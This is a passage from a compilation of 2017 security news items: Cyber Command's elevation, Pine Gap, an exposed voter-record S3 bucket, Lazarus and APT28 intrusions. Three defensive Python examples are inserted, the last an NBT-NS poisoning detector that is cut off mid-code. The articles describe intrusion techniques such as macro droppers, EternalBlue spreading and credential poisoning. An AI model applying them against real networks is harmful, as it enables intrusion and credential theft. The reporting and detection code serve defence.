SecurityWeek spoke to a number of the cybersecurity firms that defend against the aggressive cyber-attacks from both criminals and nation states, to get their take on this development.

The overriding view is that this is a good step.

"First," says Nathaniel Gleicher, head of cybersecurity strategy at Illumio and a former director for cybersecurity policy at The White House, "it is a recognition that cyber threats are more significant and serious than ever -- responding to them requires coordinated decision-making across all branches of the military, and elevating USCYBERCOM creates a place for that to happen."

Second, he added, "It recognizes that CyberCom's capabilities have matured over the last eight years. The responsibilities of a unified combatant command are much more significant than those of a sub-unified command -- and the consequences of mistakes are greater. Elevating CyberCom is a signal that DoD thinks it's ready for the challenge."

Ely Kahn, co-founder of Sqrrl and another former director of cybersecurity at The White House, sees it as a way of mitigating natural tensions between USCYBERCOM and the NSA. "A military commander may want to disrupt communications of an enemy leading up to or during an operation," he explains. "This could lead to an intelligence professional losing a key source of information. By putting USCYBERCOM on equal footing as the NSA in terms of being a direct report to the SECDEF, it gives more balance to these opposing objectives when a debate arises."

Elevating Cyber Command to a Unified Combatant Command will inevitably give it greater freedom of action while also attracting more skilled operatives. "I expect that we will see large increases to budget and staffing now, with a focus on recruiting the kind of top-level talent that the government has had some difficulty in acquiring previously," suggests Nathan Wenzler, chief security strategist at AsTech. "But given the more autonomous nature of how U.S. Cyber Command will be able to operate, and to present itself as a more prestigious opportunity to serve one's country, I believe it will have a much better chance to recruit that critical talent than other agencies have done up until this point."

Chris Roberts, chief security architect at Acalvio, believes it is an important step in U.S. cyber operations. "Cyber Command arguably enables all of the other combatant commands that are in place," he explains. "There's a number of them that obviously cover all other aspects, so it seems 'right' to elevate cyber to its own UCC that can have influence/management and control over cyber operations as well as manpower, cybersecurity and IT and operational tech infrastructure requirements."

One consistent view is that it is a good and necessary process -- and if anything, none too soon. "Since North Korea attacked Sony in 2014, the United States has been plagued by constant, sophisticated cyber-attacks that have threatened our critical infrastructure, undermined our democracy, stolen from our banks and businesses, compromised the identities of our citizens and have locked our information away behind malicious encrypted code," says Eric O'Neill, currently national security strategist with Carbon Black -- but once an investigative specialist for the National Security Division of the FBI.

"For some time now I have preached that there are no hackers, there are only spies. The majority of successful breaches are driven by foreign cyber intelligence units -- cyber spies from other nations -- that use traditional espionage tactics in a digital environment to disable, steal, destroy and disrupt information. The United States has fallen far behind the curve in addressing the external cyber threat. I applaud the initiative in elevating the US Cyber Command."

Paul Kurtz, co-founder and CEO of TruSTAR Technology and a former White House National Security Council staff member, takes a similar view. "This decision affirms cyberspace as a new war domain," he told SecurityWeek. "The timing is ripe to form this command given the growing severity of cyber-attacks. Adversaries have shown they are ready to use cyber weapons to handicap military readiness and response or to disrupt or destroy critical infrastructure in the U.S. This decision also signals our intent to continue developing cyber weapons, and our adversaries will take note. The government's current ability to defend critical infrastructure is inherently limited and the private sector will need to step up sooner rather than later to exchange information about attacks underway to better defend ourselves."

However, the elevation of Cyber Command is only considered a first step -- the complete separation from the NSA with its own commander is considered an important next step.

"Cyber Command is responsible for coordinating and leading military network defense. Placing this effort in spy agencies like the CIA and NSA is no longer effective," says O'Neill. "Indeed, how can we trust the NSA and CIA to defend us in the cyber war we are fighting when the agencies cannot defend their own attack tools? The breaches by the Shadow Brokers and the Vault-7 release to Wikileaks demonstrate that the US requires a better coordinated effort to defend against cyber-attacks."

Gleicher adds, "As important as this decision is, I am watching for another change to CyberCom that has also long been in the works but was delayed last week. CyberCom is led by Admiral Rogers, the same official who also heads the National Security Agency. The other big change that is discussed alongside elevating USCYBERCOM is separating out these two commands -- giving CyberCom its own leader. This is an important step," he believes, "because the mission of the NSA is different from the mission of the military, and lumping them together under the same leader means that when those two missions conflict, one set of priorities has to win out over the other. As serious as the cyber threat is today, it's past time that we had an independent voice inside the DoD advocating for cyber defense. CyberCom could be that voice, and I'm hopeful that last week's announcement is only the first step, and command separation will follow."

The last word comes from O'Neill. "Many Americans have forgotten the Cold War, fought with the Soviet Union over nuclear ambitions and military force projection across the globe. The truth is that the Cold War did not end with the fall of the USSR. Instead, the war multiplied to a strategic and tactical war in cyberspace. Russia, China, North Korea, Iran and other nation states have attacked the United States effortlessly and remorselessly over the last decade. Cyber-attacks are the perfect warfare. They hide behind a manufactured cloak of anonymity, deal in secrecy and disruption, and effortlessly steal information that improves the economics and policies of rival nations. The United States has long required a new approach to addressing the external cyber threat from military and spy agencies. Our civilian agencies could not carry the burden. I hope that the new Unified Cyber Command can take up the charge."


New Snowden Doc Exposes How NSA's Facility in Australia Aids Drone Strikes
21.8.2017 thehackernews BigBrothers

New documents leaked by former NSA contractor Edward Snowden have exposed a secretive United States facility located near a remote town in Australia's Northern Territory that covertly monitors wireless communications and supports US military missions.
The leaked documents have come from the massive trove of classified material stolen by Snowden from the US National Security Agency (NSA) in 2013 that exposed the extent of the US government's global surveillance programs.
The newly released classified documents, obtained by The Intercept, contained references to a secretive facility, which was codenamed "Rainfall," but is officially known as the Joint Defence Facility Pine Gap.
The documents reveal that the Joint Defence Facility Pine Gap, located outside Alice Springs, deployed cutting-edge satellite technology for detailed geolocation intelligence that helps the US military locate targets for special forces and drone strikes.
The use of unmanned air vehicles, generally known as drones, by the U.S. military has previously been blamed for hundreds of civilian deaths in countries like Pakistan, Afghanistan, Yemen, Syria, and Somalia.
As outlined in a secret intelligence document, Pine Gap's aim is to "support the national security of both the U.S. and Australia. The [facility] contributes to verifying arms control and disarmament agreements and monitoring military developments."
However, in reality, Pine Gap has a far broader mission with powerful capabilities than the Australian or U.S. government has ever publicly acknowledged.
Pine Gap finds Targets for U.S. Drone Strikes
The satellites used by Pine Gap are described as "geosynchronous"—likely positioned high in orbit, more than 20,000 miles above the earth's surface—and are equipped with powerful surveillance technology to monitor wireless communications on the ground, such as those sent and received by mobile phones, radios, and satellite uplinks.
According to the leaked documents, these satellites collect "strategic and tactical military, scientific, political, and economic communications signals," and also keep eyes on any missile or weapon tests in targeted countries, steal intel from foreign military data systems, and provide surveillance support to United States forces.
One of the secret NSA documents analysed by the Australian Broadcasting Corporation (ABC) suggests that the facility's role is not only to collect signals, but also to analyse them, as it "detects, collects, records, processes, analyses and reports" on almost everything—from surface-to-air missiles to anti-aircraft artillery and fighter aircraft.
One mission even pilfered communications from the former Soviet Union, China, East Asia, South Asia, the Middle East, Eastern Europe, and territories in the Atlantic Ocean.
In 2013, the Sydney Morning Herald reported that Pine Gap played a major role in controversial U.S. drone strikes, which had also resulted in the deaths of hundreds of innocent civilians.
Trump Administration Doubled the Drone Strikes
Richard Tanter, the University of Melbourne’s professor who has previously studied Pine Gap, told the publication that "Pine Gap will be contributing hugely in real-time to those operations, as well as in preparation for them."
"So whether or not the Australian government thinks that an attack on North Korea is either justified or a wise and sensible move, we will be part of that. We'll be culpable in terms of the consequences," Tanter asserted.
Under the Trump administration, drone strikes and special operations raids have doubled, while the battlefield rules intended to prevent civilian deaths in such air attacks have simultaneously been loosened.
However, David Rosenberg, who worked inside Pine Gap as a team leader of weapon signals analysis for at least 18 years until 2008, confirms the facility's geolocation capability, claiming that preventing civilian casualties is a high priority.
"One thing I can certainly tell you the governments of Australia, and the United States would, of course, want to minimise all civilian casualties," Rosenberg says. "Pine Gap does help to provide limitation of civilian casualties by providing accurate intelligence."
It is not at all surprising to see Australia working closely with its U.S. counterparts on global surveillance, since it is a key member of the "Five Eyes" alliance—alongside the US, UK, New Zealand and Canada—whose members openly share secret intelligence reports.


Misconfigured AWS S3 exposed 1.8 million US voter records
19.8.2017 securityaffairs BigBrothers

More than 1.8 million voter records belonging to Americans have been accidentally leaked online by a US voting machine supplier for dozens of US states.

It has happened again: the voter records were left openly accessible online due to a misconfiguration in AWS-hosted storage.
Once again, the huge trove of records was spotted by the well-known UpGuard researcher Chris Vickery. The archive contained records that ES&S collected from recent elections in Chicago, Illinois.

“As part of an effort to find unsecured files on Amazon Web Services (AWS) server platforms, a private researcher completed a download of the Election Systems & Software (ES&S) backup files of voter data that were prepared for Chicago’s electronic pollbooks and stored on the AWS platform.” reads the statement issued by ES&S. “The voter data in the backup files included about 1.8 million names, addresses, dates of birth, partial Social Security numbers, and in some cases, driver’s license and state ID numbers.”

The records included voters’ names, addresses, dates of birth, and partial social security numbers. In some cases, the records also included drivers’ licenses and state ID numbers.

“The backup files on the AWS server did not include any ballot information or vote totals and were not in any way connected to Chicago’s voting or tabulation systems,” reads the statement issued by the ES&S.

“These back-up files had no impact on any voters’ registration records and had no impact on the results of any election.”

Vickery alerted ES&S on August 12; he had discovered the data while investigating sensitive data insecurely hosted on AWS.

The cloud system was taken down four hours after the expert notified the company, which supplies voting machines and backend services to more than 40 US states.

According to UpGuard, the vulnerable service was an AWS S3 instance accidentally set up to be open to the public. At the time of writing, we have news only that Chicago voters' data was exposed.
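The failure described above is a bucket whose policy or ACL grants read access to everyone. The following is an added example, not code from UpGuard or ES&S, showing how a defender can review an S3 bucket policy document and ACL grant list offline and flag the grants that make a bucket public. The policy and grants below are constructed samples (the real ES&S configuration was never published); the two grantee group URIs are the real AWS identifiers for "everyone" and "any authenticated AWS user".

```python
import json

# Constructed sample bucket policy of the kind that exposes a bucket to the world.
PUBLIC_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "OpenRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-backups", "arn:aws:s3:::example-backups/*"],
    }],
})

# The same bucket after hardening: access limited to one (made-up) account.
PRIVATE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AccountRead",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111122223333:root"},
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-backups", "arn:aws:s3:::example-backups/*"],
    }],
})

# Constructed ACL grant lists in the shape returned by the S3 GetBucketAcl API.
PUBLIC_ACL_GRANTS = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
]
PRIVATE_ACL_GRANTS = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
]

# Real S3 predefined groups that mean "anyone on the Internet" / "anyone with an AWS account".
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def _as_list(value):
    """Policy fields may be a single string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def policy_findings(policy_json):
    """Describe every Allow statement whose principal is the anonymous wildcard."""
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        # Principal is either the string "*" or a map such as {"AWS": "*"} / {"AWS": [...]}.
        aws = principal.get("AWS") if isinstance(principal, dict) else principal
        if "*" not in _as_list(aws):
            continue
        sid = stmt.get("Sid", "<no Sid>")
        if stmt.get("Condition"):
            # A condition may restrict the wildcard (e.g. to a VPC); needs human review.
            findings.append(f"{sid}: anonymous principal with Condition (review manually)")
        else:
            findings.append(f"{sid}: anonymous principal allowed {', '.join(_as_list(stmt.get('Action', [])))}")
    return findings


def acl_findings(grants):
    """Describe ACL grants to the AllUsers / AuthenticatedUsers groups."""
    return [
        f"{g['Permission']} granted to {g['Grantee']['URI'].rsplit('/', 1)[-1]}"
        for g in grants
        if g["Grantee"].get("URI") in PUBLIC_GROUP_URIS
    ]


def is_public(policy_json, grants):
    """True if either the policy or the ACL opens the bucket beyond the owning account."""
    return bool(policy_findings(policy_json) or acl_findings(grants))


if __name__ == "__main__":
    for label, policy, grants in [("public", PUBLIC_POLICY, PUBLIC_ACL_GRANTS),
                                  ("private", PRIVATE_POLICY, PRIVATE_ACL_GRANTS)]:
        print(label, "->", "PUBLIC" if is_public(policy, grants) else "ok",
              policy_findings(policy) + acl_findings(grants))
```

On a live account the same two functions can be fed the output of the `get_bucket_policy` and `get_bucket_acl` calls of the boto3 S3 client; checking both matters because an ACL grant to AllUsers exposes a bucket even when the policy document looks tight, and vice versa.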

Chicago’s election board, meanwhile, was concerned by the discovery but appreciated the efforts of ES&S in promptly responding to the incident.

“We have been in steady contact with ES&S to order and review the steps that must be taken, including the investigation of ES&S’s AWS server,” reads a statement issued by the Chicago Election Board chairwoman Marisel Hernandez.

“We will continue reviewing our contract, policies and practices with ES&S. We are taking steps to make certain this can never happen again.”

Chris Vickery has discovered many other striking cases of open databases exposed on the Internet. In July he discovered data belonging to 14 million U.S.-based Verizon customers that had been exposed on an unprotected AWS server by a partner of the telecommunications company. In December 2015 the security expert discovered 191 million records belonging to US voters online, and in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a leak of 1.37 billion records, and in June 2017 Vickery revealed that the DRA firm had left 1.1 TB of data unsecured on an Amazon S3 bucket, exposing 198 million US voter records.


China Opens its First 'Cyber Court'

18.8.2017 securityweek BigBrothers
China's first "cyber court" was launched on Friday to settle online disputes, as the legal system attempts to keep up with the explosion of mobile payment and e-commerce.

Residents of the eastern city of Hangzhou -- home to e-commerce giant Alibaba -- can now register their internet-related civil complaints online and then log on to their trial via videochat.

The cyber court will "offer regular people an efficient, low-cost solution to these new kinds of disputes that take place on the internet," Du Qian, the cyber-court chief justice, told the official Supreme People's Court news agency.

"Not only will this make lawsuits as convenient as online shopping, but it will also give online shopping the same degree of judicial protection as consumption at brick-and-mortar stores."

The court will handle cases such as online trade disputes, copyright lawsuits and product liability claims for online purchases.

China is home to the world's largest number of internet users -- 731 million at the end of last year -- and e-commerce is a vital part of the government's efforts to turn China into a consumer demand-driven economy.

Consumers spent $17.8 billion during Alibaba's biggest online shopping promotion on November 11 last year, more than twice the five-day desktop sales from Thanksgiving through Cyber Monday in the US last year.


U.S. Military to Create Separate Unified Cyber Warfare Command

18.8.2017 securityweek BigBrothers
President Donald Trump ordered the US military on Friday to elevate its cyber warfare operations to a separate command, signaling a new strategic emphasis on electronic and online offensive and defensive operations.

"This new Unified Combatant Command will strengthen our cyberspace operations and create more opportunities to improve our nation's defense," Trump said in a statement.

"The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries."

The move would expand the number of the Defense Department's unified combatant commands to 10, putting cyber warfare on an equal footing with the Strategic Command, the Special Operations Command, and regional commands.

Until now cyber warfare operations have been run under the umbrella of the National Security Agency, the country's main electronic spying agency, with Admiral Michael Rogers heading both.

Discussions on whether to hive it off and place it directly under Pentagon direction have gone on for several years. Rogers has said several times over the past year that they needed to recruit hundreds more skilled cyber operators before the separation could take place.

Trump's statement suggested the final shape of where the new unified command will fit into the Pentagon remains unsettled. Defense Secretary Jim Mattis is currently reviewing separating the Cyber Command from the NSA, he said.


Flashpoint Launches Intelligence Academy

18.8.2017 securityweek BigBrothers
New Intelligence Academy Aims to Help Organizations Reduce Risk by Better Understanding Threats and Prioritizing Response

Business Risk Intelligence (BRI) is a term that is easy to understand in concept, but difficult to action in practice. The problem is that business structures are all too often silos of individual responsibilities. Cyber security risk is a good example. Different cyber security control functions are often silos with little inter-control functionality. But cyber security itself is also a siloed department within the business -- again with little inter-departmental functionality.

Risk, however, is not siloed -- risk affects the whole business and honors no siloed structure. Risk management needs to be treated holistically, analyzing business risk rather than just cyber risk -- because, says Flashpoint's BRI principal advisor, Brian Mohr, in a blog post, BRI includes not just cyber and insider risk, but also "global risk, fraud, anti-money laundering, executive protection, and physical security, to name a few." These risks are inter-related; and business needs to adopt an integrated approach to BRI.

The solution to risk is threat intelligence -- but most cyber threat intelligence sources are disjointed. For example, in a 2016 analysis of 88 IP-based blacklists and 35 domain name blacklists, Carnegie Mellon found that the majority of threat-indicated sources appeared on only one of the lists. For maximum threat intelligence, risk managers would need to subscribe to all the lists -- and risk being overwhelmed by noise within the intelligence. And they would still be limiting their intelligence to the cyber realm alone.

But for true business risk intelligence, many more factors need to be included -- such as geopolitical flashpoints, potential exchange rate fluctuations, staff travel arrangements and more. For example, "Few threats expose the true interdependency of cyber and physical security more than those targeting the oil and natural gas (ONG) sector," wrote Flashpoint CEO Josh Lefkowitz in a blog earlier this month. "After all, oil and natural gas together account for 53 percent of the world’s energy consumption and remain integral determinants of both global trade and the economy."

In its January 2017 Business Risk Intelligence Decision Report, Flashpoint expanded on this principle. "Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," it warned. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

To help corporations take the required holistic view of business risk, Flashpoint offers its own BRI service. It gathers the intelligence and performs the analysis of that intelligence for its customers. It combines the different threat indicators into a holistic risk analysis, delivering integrated business risk intelligence.

But one basic problem remains -- not all companies know how to use the intelligence they receive. "Having spent my career in the government and the intelligence community, as well as at a Fortune 10 company," writes Mohr, "I understand without hesitation that the fundamental purpose of intelligence is to support decision-making. However, I also understand the struggles of implementing the intelligence lifecycle into practical business use."

Lefkowitz and his team at the New York, NY-based threat intelligence and research company have many years' experience of working both within national intelligence agencies and major international corporations. For example, Mohr spent 15 years as a Counterintelligence/Human Intelligence Specialist for the U.S. Marine Corps, conducting both human intelligence activities in support of U.S. combat units in the Middle East, as well as technical counterintelligence investigations across the Asia-Pacific theater. He then spent two years with the cyber threat intelligence team at American Express.

It is this combination of pure intelligence analysis and business understanding that Flashpoint now wishes to disseminate. It has today launched the Flashpoint Intelligence Academy (FIA). Its purpose is to help organizations understand how to structure an action program that embraces the full combined intelligence of BRI.

"We created FIA as a means to transfer what we’ve learned from our own experiences in building intelligence programs to our customers in a meaningful way," explains Mohr. "I came to Flashpoint because I realized that the company was helping its customers, not from the standpoint of just blocking IOCs, but actually supporting customers to reduce their overall risk. And I know FIA is the program to continue to support that goal."

The FIA offers foundational (one-day sessions); intermediate (two or three-day sessions); and advanced workshops. These workshops are available to any organization involved in actioning BRI, and not just Flashpoint customers. "Using the BRI principles taught in these workshops," says the on-site blurb, "organizations can better understand the threats they may face, prioritize their responses, make more informed decisions, and become a source for developing and driving risk intelligence application across the business."

Flashpoint raised $28 million in Series C funding in July 2017, after raising $10 million in July 2016.


U.S. Army to Protect Warfighters With Continuous Biometric Authentication

17.8.2017 securityweek BigBrothers
U.S. Army's NETCOM to Deploy Continuous Biometric Authentication Software to Protect Warfighters

The fundamental basis of security is to stop bad guys (or things) getting in; and then, if that fails, to discover those who got in as rapidly as possible. Authentication is used for the former, and network anomaly detection is increasingly used for the latter.

Both controls can be good in theory, but often fall down in practice; the more effective they are, the more intrusive they become. Authentication can be strengthened by enforcing strong unmemorable passwords, and multi-factor authentication -- often making it difficult and time-consuming for the user. Anomaly detection can be improved by reporting and responding to every single alert -- often overwhelming security analysts with the sheer volume of work.

To solve both problems, companies often set their security barriers lower than they could be. Authentication is made easier and alerts are set lower so that work is less interrupted. As a result, adversaries can get into the network and stay hidden long enough to cause damage -- and this is demonstrated every week by new announcements of both major and minor breaches.

Plurilock believes it may have the answer in low-friction continuous behavioral biometric user authentication. Called BioTracker, the product continuously (sampling every few seconds) monitors the user, analyzing keystroke and mouse patterns and using artificial intelligence (AI) to provide a probability score that the current user is the authorized user.

In its own words, Plurilock today announced, "The U.S. Army Network Enterprise Technology Command (NETCOM) will deploy Plurilock’s BioTracker continuous authentication cybersecurity software to protect the warfighter against adversarial identity compromise."

Keith Trippie, retired executive director for the Enterprise System Development Office with the U.S. Department of Homeland Security, explains, “BioTracker enhances government and corporate cybersecurity by bolstering existing authentication capabilities such as CACs, two-factor, multi-factor and even biometric authentication, to safeguard vital data, intelligence systems and privileged accounts from both sophisticated cyber campaigns and insider threats. Plurilock’s platform provides reliable, real-time visibility and security with virtually zero authorized user friction."

This means that the initial user authentication barrier can be set very low, so that daily work is not interrupted. From then on, BioTracker monitors the user against known biometric behavioral patterns. Plurilock claims that it takes just 20 minutes to learn a user’s keystroke style and speed, mouse use and other behaviors to build a biometric profile.

CEO Ian Paterson told SecurityWeek that face and voice recognition could be added to the mix, but they had been omitted because of privacy issues from both users and privacy regulations in a corporate environment. Other biometric methods such as fingerprint scans and iris scans increase user friction and remain point rather than continuous authentication.

"Our method," he said, "satisfies privacy issues and introduces zero user friction." Furthermore, he added, it solves a major weakness in biometric authentication. "People change, both with age and over time. BioTracker's continuous monitoring of the user's biometric behavior allows it to detect these slow and minute changes, feeding them back into the known user profile and maintaining biometric accuracy."

Continuous user monitoring marks a huge change from the binary accept/reject approach of traditional user authentication. It is made possible by BioTracker's AI engine. AI generally deals with probability scores rather than just on/off. This allows greater flexibility. For example, the impact of false positives can be reduced by progressively limiting access. Thus, if, for any reason, a user's pattern is slightly off (stress, illness, post-party hangover), BioTracker can be used to limit access to particularly sensitive parts of the network until the user's authenticity is validated.

It is more likely, however, that this biometric monitoring will clearly indicate whether the user is the authorized user. Since the sampling is done every few seconds, the presence of an intruder on the network is confirmed within seconds of the intrusion. This is where BioTracker can reduce the workload on security analysts. Rather than having to wait for and triage a large number of network anomalies, the analysts know within seconds that an intrusion has occurred, and exactly where it occurred. Containment can be effected within minutes of the intrusion.
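The two ideas in the passages above, a probability score instead of a binary accept/reject and graduated access when the score is merely uncertain, can be shown with a small keystroke-dynamics model. The following is an added example and not Plurilock's code or algorithm: the features (drift of the mean inter-key latency and the share of outlying keystrokes), the logistic weights, the access thresholds and the latency samples are all constructed for illustration. It also shows the feedback loop from the passage below, where the profile slowly adapts to the user, restricted to windows the model already attributes to the user with high confidence so that an impostor cannot train the profile towards their own behaviour.

```python
import math
import statistics

# Constructed inter-key latencies in milliseconds (not real telemetry).
ENROLLMENT = [140, 160, 180, 200, 220] * 40       # enrollment typing, mean 180 ms
SAME_USER_WINDOW = [150, 170, 180, 190, 210] * 6   # the enrolled user, seconds later
STRESSED_WINDOW = [170, 190, 200, 210, 230] * 6    # same user, noticeably slower
IMPOSTOR_WINDOW = [90, 110, 120, 130, 150] * 6     # someone else at the keyboard

FULL_ACCESS = 0.8      # illustrative thresholds, not vendor values
LIMITED_ACCESS = 0.3


def enroll(latencies):
    """Build a behavioural profile from enrollment keystroke latencies."""
    return {"mean": statistics.fmean(latencies),
            "sd": statistics.pstdev(latencies) or 1.0,
            "n": len(latencies)}


def session_score(profile, window):
    """Probability-like score in (0, 1) that `window` was typed by the profiled user.

    Feature 1: z-score of the window's mean latency against the profile.
    Feature 2: share of keystrokes more than two profile standard deviations away.
    """
    se = profile["sd"] / math.sqrt(len(window))
    z = abs(statistics.fmean(window) - profile["mean"]) / se
    outliers = sum(abs(x - profile["mean"]) > 2 * profile["sd"] for x in window) / len(window)
    # Logistic combination; the weights are illustrative constants.
    return 1.0 / (1.0 + math.exp(0.8 * z + 6.0 * outliers - 3.0))


def access_decision(score):
    """Map a score onto graduated access instead of a binary accept/reject."""
    if score >= FULL_ACCESS:
        return "full"
    if score >= LIMITED_ACCESS:
        return "limited"   # block sensitive resources until the user re-validates
    return "lock"          # terminate the session and alert analysts


def update_profile(profile, window, score, alpha=0.1):
    """Slowly adapt the profile, but only to windows confidently attributed to the user."""
    if score < FULL_ACCESS:
        return profile
    return {"mean": (1 - alpha) * profile["mean"] + alpha * statistics.fmean(window),
            "sd": (1 - alpha) * profile["sd"] + alpha * (statistics.pstdev(window) or 1.0),
            "n": profile["n"] + len(window)}


def evaluate(profile, window):
    """Score one sampling window and return (score, access decision)."""
    score = session_score(profile, window)
    return score, access_decision(score)


if __name__ == "__main__":
    profile = enroll(ENROLLMENT)
    for name, window in [("same user", SAME_USER_WINDOW),
                         ("stressed user", STRESSED_WINDOW),
                         ("impostor", IMPOSTOR_WINDOW)]:
        score, decision = evaluate(profile, window)
        print(f"{name:14s} score={score:.3f} -> {decision}")
        profile = update_profile(profile, window, score)
```

With these samples the enrolled user scores about 0.95 (full access), the slower, stressed user about 0.48 (limited access pending re-validation) and the impostor effectively zero (lock). A production system would use many more features (digraph timings, mouse velocity and curvature) and calibrated rather than hand-picked weights, but the shape of the decision logic is the same.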

“Plurilock," explains Paterson, "offers dependable protection against security breaches with real-time detection and immediate notification in the event of unusual user behavior, to reduce risk and cut detection and resolution time from many months to mere minutes, saving precious time and money. Its proof-of-presence technology also ensures outstanding compliance to meet even the most stringent regulatory mandates, and because there are no manual authentication procedures required, it has zero impact on productivity. Users can go about their normal activities with the confidence that Plurilock has them covered.”


North Korea-Linked Hackers Target U.S. Defense Contractors

14.8.2017 securityweek BigBrothers
The North Korea-linked cyber espionage group known as Lazarus is believed to be behind attacks targeting individuals involved with United States defense contractors, Palo Alto Networks reported on Monday.

The threat actor, which has been active since at least 2009, is said to be responsible for several high-profile attacks, including the 2014 attack targeting Sony Pictures. Links have also been found to the recent WannaCry ransomware attacks.

The Lazarus group, tracked by the U.S. government as Hidden Cobra and known by security firms for its Operation Blockbuster, Dark Seoul and Operation Troy campaigns, continues to be active. Recent attacks observed by Palo Alto Networks against U.S. defense contractors appear to have been launched either by this group directly or in cooperation with other cyberspies.

According to researchers, the hackers have sent out spear phishing emails containing weaponized Microsoft Office documents written in English that use macros to deliver a piece of malware.

Specifically, Palo Alto has seen decoy documents describing job openings at some U.S. defense contractors. The text in these documents appears to be an exact copy, including typos, of job descriptions available on the legitimate company’s website.

There are several links between these attacks and other recent campaigns, including very similar macros, decoy document details, command and control (C&C) servers, and payloads.

“This reuse of macro source code, XOR keys used within the macro to decode implant payloads, and the functional overlap in the payloads the macros write to disk demonstrates the continued use of this tool set by this threat group. The use of an automated tool to build the weaponized documents would explain the common but not consistent reuse of metadata, payloads, and XOR keys within the documents,” researchers explained.

Palo Alto Networks pointed out that the tools and tactics used by the group have changed little compared to previous campaigns, despite the numerous reports describing its activities. This has led experts to believe that the Lazarus group will continue to launch targeted attacks.

While the gang has been tied to several espionage and destruction campaigns, many of its recent attacks appear to have focused on financial institutions, including Bangladesh’s central bank and banks in Poland.


Cyberspies Are Using Leaked NSA Hacking Tools to Spy On Hotels Guests
12.8.2017 thehackernews  BigBrothers

An infamous Russian-linked cyber-espionage group has been found re-using the same leaked NSA hacking tool that was deployed in the WannaCry and NotPetya outbreaks—this time to target Wi-Fi networks to spy on hotel guests in several European countries.
Security researchers at FireEye have uncovered an ongoing campaign that remotely steals credentials from high-value guests using Wi-Fi networks at European hotels and attributed it to the Fancy Bear hacking group.
Fancy Bear—also known as APT28, Sofacy, Sednit, and Pawn Storm—has been operating since at least 2007 and has also been accused of hacking the Democratic National Committee (DNC) and the Clinton campaign in an attempt to influence the U.S. presidential election.
The newly-discovered campaign is also exploiting the Windows SMB exploit (CVE-2017-0143), called EternalBlue, which was one of many exploits allegedly used by the NSA for surveillance and leaked by the Shadow Brokers in April.
EternalBlue exploits a vulnerability in version 1 of Windows' Server Message Block (SMB) networking protocol to spread laterally across networks, and is what allowed the WannaCry and Petya ransomware to spread across the world so quickly.
Since the EternalBlue code is available for anyone to use, cyber criminals are widely trying to use the exploit to make their malware more powerful.
Just last week, a new version of credential stealing TrickBot banking Trojan was found leveraging SMB to spread locally across networks, though the trojan was not leveraging EternalBlue at that time.
However, researchers have now found someone deploying the exploit to upgrade their attack.
"To spread through the hospitality company's network, APT28 used a version of the EternalBlue SMB exploit," FireEye researchers write. "This is the first time we have seen APT28 incorporate this exploit into their intrusions."
Researchers have seen ongoing attacks targeting a number of companies in the hospitality sector, including hotels in at least seven countries in Europe and one Middle Eastern country.
Here's How the Attack is Carried Out
The attacks began with a spear phishing email sent to one of the hotel employees. The email contains a malicious document named "Hotel_Reservation_Form.doc," which uses macros to decode and deploy GameFish, malware known to be used by Fancy Bear.
Once installed on the targeted hotel's network, GameFish uses the EternalBlue SMB exploit to laterally spread across the hotel network and find systems that control both guest and internal Wi-Fi networks.
Once under control, the malware deploys Responder, an open source penetration testing tool created by Laurent Gaffie of SpiderLabs, for NetBIOS Name Service (NBT-NS) poisoning in order to steal credentials sent over the wireless network.
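The NBT-NS poisoning step described above is also one of the easier stages of this intrusion to catch. A poisoner answers every name it hears, so a defender can broadcast queries for "canary" names that nothing on the network legitimately owns and alert on any positive answer. The following is an added example written for this page; it is not FireEye's, Responder's or any vendor's code. The packet layout follows RFC 1002 (NBT-NS name query and positive name query response); the canary names, hosts and addresses are constructed.

```python
import struct

# Added example (not FireEye's or Responder's code): detect an NBT-NS poisoner by
# watching for positive name responses to "canary" names that nothing on the LAN
# should legitimately own. The packet encoders follow RFC 1002; the sample hosts,
# names and addresses are constructed for this example.

FLAG_RESPONSE = 0x8000      # QR bit in the NBT-NS header flags
FLAG_AUTHORITATIVE = 0x0400
FLAG_BROADCAST_RD = 0x0110  # broadcast query, recursion desired
QTYPE_NB = 0x0020           # NetBIOS general name service resource record
CANARY_NAMES = {"CANARY01", "FILESRV-OLD"}  # assumed: reserved, never registered


def first_level_encode(name, suffix=0x00):
    """RFC 1002 first-level encoding: 15-char padded name + suffix byte, each nibble + 'A'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append(((b >> 4) & 0xF) + 0x41)
        out.append((b & 0xF) + 0x41)
    return bytes([32]) + bytes(out) + b"\x00"


def first_level_decode(buf, off):
    """Return (name, suffix, offset_after_name) for the encoded name at buf[off:]."""
    n = buf[off]
    enc = buf[off + 1:off + 1 + n]
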